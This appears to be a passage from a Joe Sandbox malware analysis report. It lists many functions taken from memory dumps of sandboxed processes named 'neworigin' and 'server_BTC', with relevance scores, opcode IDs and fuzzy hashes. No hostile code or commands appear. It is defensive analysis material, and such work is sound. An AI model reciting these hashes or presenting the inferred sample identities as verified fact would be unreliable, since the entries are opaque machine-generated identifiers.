                                                                                                                • Instruction Fuzzy Hash: F301B131B141500FDBA5967C9851B6FB7EACBCA720F24843AE60ECB355ED65DC0243A1
                                                                                                                Function 06873CD8 Relevance: .1, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 766b195d177816a3fa8b00dc766b61e67791333f092ff40cef43dd1470ed0367
                                                                                                                • Instruction ID: f51f95b69284d9fafc19d25551b37ae4b4c56e05688fa7cdf68674cbc5231742
                                                                                                                • Opcode Fuzzy Hash: 766b195d177816a3fa8b00dc766b61e67791333f092ff40cef43dd1470ed0367
                                                                                                                • Instruction Fuzzy Hash: F7118232B101294FDB94A668C815AEE77EAEBC8211B004439D906EB344EE25DC019BD1
                                                                                                                Function 0687A409 Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 350c6652ac1191227fd82e834db2b52d13347d99818451ecefd84bb08348817c
                                                                                                                • Instruction ID: c601341eba92f6b0c1e81a23672f6120baebc0ad63bd28d78aded75de5f9ac7e
                                                                                                                • Opcode Fuzzy Hash: 350c6652ac1191227fd82e834db2b52d13347d99818451ecefd84bb08348817c
                                                                                                                • Instruction Fuzzy Hash: 10012432B005104FDBB99E3CE86476E77D5EBCA710F108839E60ACB351EE22DC028395
                                                                                                                Function 06873990 Relevance: .1, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2400ce0e7f991c68c3e3ea3c2b721b94a5788acddaa441fa4e6fb26915edef23
                                                                                                                • Instruction ID: 6ecb44a4b6586434e792716e0386edc6f4a5678ad6410c46da1f80c0fadea3d3
                                                                                                                • Opcode Fuzzy Hash: 2400ce0e7f991c68c3e3ea3c2b721b94a5788acddaa441fa4e6fb26915edef23
                                                                                                                • Instruction Fuzzy Hash: 3221E0B1C01659AFDB00CF9AD984BCEFBB4FF48710F10812AE918B7600C374A954CBA5
                                                                                                                Function 0687EEB9 Relevance: .1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8d38c84eb861f430f379eae458c18e0200c6a5f9dd7f9cd48e1ee3e5fd31e6ef
                                                                                                                • Instruction ID: dee05f88a3909150e3d228d2efb9fa26f95068ef19f7cae63eb820f7c4e40616
                                                                                                                • Opcode Fuzzy Hash: 8d38c84eb861f430f379eae458c18e0200c6a5f9dd7f9cd48e1ee3e5fd31e6ef
                                                                                                                • Instruction Fuzzy Hash: D401F231B140154BCBA5DAACE458B6F77DADBC9724F1488BAF60ACB740EE61DC028395
                                                                                                                Function 06873CC7 Relevance: .1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cfa4709fae22c937e3334f53ae070570bd96518894c0244605d1a38e945718a6
                                                                                                                • Instruction ID: 2d5b54bdfd5ec078bb56715c04b09b101dc8a043ae954153f4c5948d3944e293
                                                                                                                • Opcode Fuzzy Hash: cfa4709fae22c937e3334f53ae070570bd96518894c0244605d1a38e945718a6
                                                                                                                • Instruction Fuzzy Hash: 77012432B140644BCF949668DC10AEF36AAEBC8211F04443AD90AD7284EE20CD0187D2
                                                                                                                Function 06873998 Relevance: .1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 34ceedad95d9bf6e35c3608cf792a90826da4c8d7a855e0406f42df62cd70537
                                                                                                                • Instruction ID: cbbcd38267106627b912e0fdecdb817f917e47f8b07855dec915a00394f35212
                                                                                                                • Opcode Fuzzy Hash: 34ceedad95d9bf6e35c3608cf792a90826da4c8d7a855e0406f42df62cd70537
                                                                                                                • Instruction Fuzzy Hash: EB11D0B1D05619AFDB00CF9AD985BCEFBB8FB48710F10812AE918B7240C374A954CFA5
                                                                                                                Function 06874328 Relevance: .1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8c23b4883e548f93c832c207f72b55a877f7185537ad6876281658090cd74028
                                                                                                                • Instruction ID: 634c1d68315aa173b71804e690a4b717abbc73621c6e712935747da751b91349
                                                                                                                • Opcode Fuzzy Hash: 8c23b4883e548f93c832c207f72b55a877f7185537ad6876281658090cd74028
                                                                                                                • Instruction Fuzzy Hash: DF016D31B100250BDBA4957D9455B2FA2DACBC9720F24C43AE60EC7344ED65DC024395
                                                                                                                Function 0687EEC8 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b7fffdaa9e9ecd65adb9d6fa44bc2d23b09b4045975c254cdea8771ed17538c0
                                                                                                                • Instruction ID: 2801f6162214800ee9ee2cbba467c3fc3041b6899aa78390f830b6502f150a1a
                                                                                                                • Opcode Fuzzy Hash: b7fffdaa9e9ecd65adb9d6fa44bc2d23b09b4045975c254cdea8771ed17538c0
                                                                                                                • Instruction Fuzzy Hash: 0601FF31B100150BDBA49AADE454B6F73CACBC9720F1088BAF20ACB740EE61DC024391
                                                                                                                Function 0687A418 Relevance: .0, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4eb40f563b3b6d84f7da10126bc0b48213a1853f8fb65250f546194f64341dcf
                                                                                                                • Instruction ID: 027d779490e12803e2933ae3586d64f1fc7521601d264bc23c5311dec7949d1f
                                                                                                                • Opcode Fuzzy Hash: 4eb40f563b3b6d84f7da10126bc0b48213a1853f8fb65250f546194f64341dcf
                                                                                                                • Instruction Fuzzy Hash: 35018131B000114FDBB4EA6CE49476E73D5DBC9714F108839E60AC7744ED22EC424781
                                                                                                                Function 068783C8 Relevance: .0, Instructions: 40COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f18a41df0a1e66d87704b52539bfdefe92288094452c839149a626516353e500
                                                                                                                • Instruction ID: 9acb3bc4279055c8342c5e213a14712548c58ee9458a821e8081845f1e50609a
                                                                                                                • Opcode Fuzzy Hash: f18a41df0a1e66d87704b52539bfdefe92288094452c839149a626516353e500
                                                                                                                • Instruction Fuzzy Hash: 10F0FFB1F002058FEFB49E48EA9A2BC73A9EB40218F004477DA08DB241DBB1D901EB90
                                                                                                                Function 0687FF18 Relevance: .0, Instructions: 37COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 82f657d4a0ea5df8441d2d8184b88890b5c219d5d0c3ee691d45abbbeaeed628
                                                                                                                • Instruction ID: 27c9be91909c77641eb4ad02401e4212a405c560d42859fa05fdec785ffa7038
                                                                                                                • Opcode Fuzzy Hash: 82f657d4a0ea5df8441d2d8184b88890b5c219d5d0c3ee691d45abbbeaeed628
                                                                                                                • Instruction Fuzzy Hash: 2AF0302434D2908FC746F7388964A593BA69FC6710F0A40EFE059CFBA2C965CC168795
                                                                                                                Function 06876569 Relevance: .0, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2b0337d309113eb64cb14228c231551ebf4d949824a16bf10501349b691f8fb4
                                                                                                                • Instruction ID: 0c4bd8cb2c3b725db4adb2b16b5723347a73d33af03516756b6ce3401126083c
                                                                                                                • Opcode Fuzzy Hash: 2b0337d309113eb64cb14228c231551ebf4d949824a16bf10501349b691f8fb4
                                                                                                                • Instruction Fuzzy Hash: A8F02730D187889BDF60CA74980876D3B68D742228F1489A9E404CB146F176D942E781
                                                                                                                Function 0687FF30 Relevance: .0, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c52366154d4257ace21f00c2c67f4d0765caf080cf0084bd7082cda3cb1c98e7
                                                                                                                • Instruction ID: 14ebb506a84bcbd59e3a1473aafb212a367c58079eb3ac14bf0cfac8921f5a6d
                                                                                                                • Opcode Fuzzy Hash: c52366154d4257ace21f00c2c67f4d0765caf080cf0084bd7082cda3cb1c98e7
                                                                                                                • Instruction Fuzzy Hash: 08E0ED313104248BD788FB69D864B6E779AAFC9B10F0680A9A51DCB7A1CDA5DC014BD5
                                                                                                                Function 06876578 Relevance: .0, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b00b601c35776acb4a301a6e176bd05ebb70eba9374bfe9bb64b196b245fec51
                                                                                                                • Instruction ID: 7c2bb7ecc0155f6146394c1126e8e667e98fb9fdcee4a2698154564653237a54
                                                                                                                • Opcode Fuzzy Hash: b00b601c35776acb4a301a6e176bd05ebb70eba9374bfe9bb64b196b245fec51
                                                                                                                • Instruction Fuzzy Hash: 20E02B70E1020CEBDF50CEB4D94975E73ADD705304F6088A4D508C7202F176DE41A781

                                                                                                                Executed Functions

                                                                                                                Function 013B7108 Relevance: .2, Instructions: 217COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: da43f1e6b6db6fa313352cf6e2f8cdedfdb45497c5df6acc8f62421ad947d18e
                                                                                                                • Instruction ID: 069fcdf71a3a888768c3417689fb5a034c3cb83b8fffc9b29f82a1765757356f
                                                                                                                • Opcode Fuzzy Hash: da43f1e6b6db6fa313352cf6e2f8cdedfdb45497c5df6acc8f62421ad947d18e
                                                                                                                • Instruction Fuzzy Hash: D571F474A00258CFCB48DFA9D89499DBBF1FF89314F109169E909AB3A5DB31AC46CF14
                                                                                                                Function 013B767A Relevance: .2, Instructions: 173COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4814ae150d02e5ad839cd7726e144e0ce1b2c5eea6279cc05952d0938abbbd70
                                                                                                                • Instruction ID: c942b5c9725336eb93552262df15b7fbb0bbb70e67637aafb76d6588c5992219
                                                                                                                • Opcode Fuzzy Hash: 4814ae150d02e5ad839cd7726e144e0ce1b2c5eea6279cc05952d0938abbbd70
                                                                                                                • Instruction Fuzzy Hash: 9D711474D01219CFDB15DFA4D894AADBBB2FF89304F208169D505BB2A8EB315D86CF40
                                                                                                                Function 013B7E54 Relevance: .1, Instructions: 99COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2c42fe5005dff10ae467a191c3f9273201e979f87727eea5d79cef0ed1add291
                                                                                                                • Instruction ID: ccb19d3ff9a42fef4879399c88334721d5db1f2e77915834a938627d9782fb73
                                                                                                                • Opcode Fuzzy Hash: 2c42fe5005dff10ae467a191c3f9273201e979f87727eea5d79cef0ed1add291
                                                                                                                • Instruction Fuzzy Hash: D841BDB0D00248DFDB14CFAAC984ADEFBB5BF89314F14802AE519AB650D774994ACF54
                                                                                                                Function 013B7E60 Relevance: .1, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f7694b6deb5b53f701dff87c6ff754a604717fcb17db8461593f337688f27027
                                                                                                                • Instruction ID: 0b55dda6210472d2f2d53214e8b8baa35a57fcd0cbb2c9065a7dee41979160b7
                                                                                                                • Opcode Fuzzy Hash: f7694b6deb5b53f701dff87c6ff754a604717fcb17db8461593f337688f27027
                                                                                                                • Instruction Fuzzy Hash: 1641BCB0D00248DFDB14CFAAC984ADEFBB5BF89304F24802AE519AB290D7749949CF54
                                                                                                                Function 013B5348 Relevance: .9, Instructions: 945COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: aac5beb1a7b730715ea21cf8022aeddf5887f9bda175523fa84ed5bc4a57d0cb
                                                                                                                • Instruction ID: 4a08e4c689ad9383179fd71836b61f8052e688972bdb5ba58633af4e43073735
                                                                                                                • Opcode Fuzzy Hash: aac5beb1a7b730715ea21cf8022aeddf5887f9bda175523fa84ed5bc4a57d0cb
                                                                                                                • Instruction Fuzzy Hash: 91B2D270D0222ACFCB68EF64D894A9DB7B2BF49304F2045E9D50DA7664EB356E81CF50
                                                                                                                Function 013B5358 Relevance: .9, Instructions: 935COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3a99bcb7559a54354c753d15a62708c41842c967eda843d5961260b4cd73ac14
                                                                                                                • Instruction ID: ee0da64cb4f1cfa727ca0b6b7f1ac5cdf567eea8ddde433fc89951234a70d403
                                                                                                                • Opcode Fuzzy Hash: 3a99bcb7559a54354c753d15a62708c41842c967eda843d5961260b4cd73ac14
                                                                                                                • Instruction Fuzzy Hash: 95B2D170D0222ACFDB68EF64D894A9DB7B2BB49304F2045E9D50DA7664EB356EC1CF40
                                                                                                                Function 013B0839 Relevance: .6, Instructions: 607COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: de01b917b4770cf9aaabd401ba63c06c3aea0a5a3ec7be36ba4390207e125e88
                                                                                                                • Instruction ID: c8a2f04704f41426561d61e96084a033cd87a87cd6c909498220c176496c4d07
                                                                                                                • Opcode Fuzzy Hash: de01b917b4770cf9aaabd401ba63c06c3aea0a5a3ec7be36ba4390207e125e88
                                                                                                                • Instruction Fuzzy Hash: 4862B070A01269CFDB68DFA4D894B9DBBF2FF48304F1081A9D519AB654EB356E81CF40
                                                                                                                Function 013B0848 Relevance: .6, Instructions: 601COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cbfff08d3059e1343a4b79a6b992d9dfea11ba45eb9a189d09eec67fce1dc2e4
                                                                                                                • Instruction ID: 2d531f674bf04cd0db9032192b7a9d8d90ce975b98b25571990e4ccef7cf7842
                                                                                                                • Opcode Fuzzy Hash: cbfff08d3059e1343a4b79a6b992d9dfea11ba45eb9a189d09eec67fce1dc2e4
                                                                                                                • Instruction Fuzzy Hash: 4762BF70A01269CFDB68DFA4D894B9DBBF2FF48304F1081A9D519AB654EB356E81CF40
                                                                                                                Function 013B7AE1 Relevance: .4, Instructions: 364COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4e372bbcbdbca7e97a873c0b70ede1b956b6330db7f716e09fd3ea6a64175e88
                                                                                                                • Instruction ID: d68f84ecfdc468e07051888e34c0685c35c5e26e306ba6c72085e39064bdebfe
                                                                                                                • Opcode Fuzzy Hash: 4e372bbcbdbca7e97a873c0b70ede1b956b6330db7f716e09fd3ea6a64175e88
                                                                                                                • Instruction Fuzzy Hash: DA41CEB0D00248DFDB15DFAAD884ADEFFF5AF89314F14802AE508AB6A0D7745985CF50
                                                                                                                Function 013B67E0 Relevance: .2, Instructions: 229COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d25c13ccf8de995a022109874c04fa06b6dd2b5ba7b8cfab97376c47c4099b08
                                                                                                                • Instruction ID: 00f9c4b9c06a9bec280b0184c79d1da587551a5129134737163693bd6131143c
                                                                                                                • Opcode Fuzzy Hash: d25c13ccf8de995a022109874c04fa06b6dd2b5ba7b8cfab97376c47c4099b08
                                                                                                                • Instruction Fuzzy Hash: E1B1DDB4E01229CFDB64DF69C984B9DBBB2BB49304F1085AAD40DA7351DB31AE85CF11
                                                                                                                Function 013B80F0 Relevance: .2, Instructions: 202COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9cae186b05ed3bfda533abacf2c1f383993b14e85a853ea7bcf17b86db2e5c9f
                                                                                                                • Instruction ID: 42edc08a60b45a35577235a63d502902a34ee77ea40fc84c6adc2ee490ddb604
                                                                                                                • Opcode Fuzzy Hash: 9cae186b05ed3bfda533abacf2c1f383993b14e85a853ea7bcf17b86db2e5c9f
                                                                                                                • Instruction Fuzzy Hash: 6391F274E01219CFCB54EFA9D894AEDBBB1FF49304F2085A9D519AB765EB306842CF10
                                                                                                                Function 013B8100 Relevance: .2, Instructions: 173COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a9a45eb33751679b942e00f03188f8e862f48225c219138d0de04e418f6af825
                                                                                                                • Instruction ID: cdf900d892c733c29313f0bc14bbba44eac63b389b382bf399986e059ccce454
                                                                                                                • Opcode Fuzzy Hash: a9a45eb33751679b942e00f03188f8e862f48225c219138d0de04e418f6af825
                                                                                                                • Instruction Fuzzy Hash: F881C274E01219CFCB54EFA9D894A9DBBB2BF49304F2085A9D519BB764EB306D41CF10
                                                                                                                Function 013B65B0 Relevance: .1, Instructions: 113COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ec11e4306f10e145388916ff9d56c245555aefba808c23535aa789152e141d9a
                                                                                                                • Instruction ID: bf450889e85a5b7d85bf98a0de92668f900539bceeb264d0831df6bdcdf36eb1
                                                                                                                • Opcode Fuzzy Hash: ec11e4306f10e145388916ff9d56c245555aefba808c23535aa789152e141d9a
                                                                                                                • Instruction Fuzzy Hash: AC5110B8D01318CFDB14DFE9E494AECBBF5BB49304F10812AD529AB695EB385942CF10
                                                                                                                Function 013B74F2 Relevance: .1, Instructions: 105COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 57ef278f54c64dc1c981c5397bf4b2ce7711508bdaa83540ebb5a79f8549b68c
                                                                                                                • Instruction ID: 28582c6a5754735e17fc45d9013e93fe7582b60729453656760b627a7846bb56
                                                                                                                • Opcode Fuzzy Hash: 57ef278f54c64dc1c981c5397bf4b2ce7711508bdaa83540ebb5a79f8549b68c
                                                                                                                • Instruction Fuzzy Hash: 53410774E002099FCB08DFA9D494AEEBBF2FF89300F148169E515B72A5DB359941CF54
                                                                                                                Function 013B7D10 Relevance: .1, Instructions: 89COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2542d72d9bcf0085572c7185c36107e91e3b372bedb0981612e233bb10355d24
                                                                                                                • Instruction ID: 26d7af4b71daa1964bea318c0bc31129b2c4df5198b93cde5916e967ee3a060a
                                                                                                                • Opcode Fuzzy Hash: 2542d72d9bcf0085572c7185c36107e91e3b372bedb0981612e233bb10355d24
                                                                                                                • Instruction Fuzzy Hash: 0F41BDB1D002489FDB14DFAAD584ADEFFF5AF88304F24802AE518AB690DB749985CF50
                                                                                                                Function 013B73A0 Relevance: .1, Instructions: 83COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 99c1484778357df7b8c4f72cfb6a0d7e86c09eb6826433b164b89ee6a0065cef
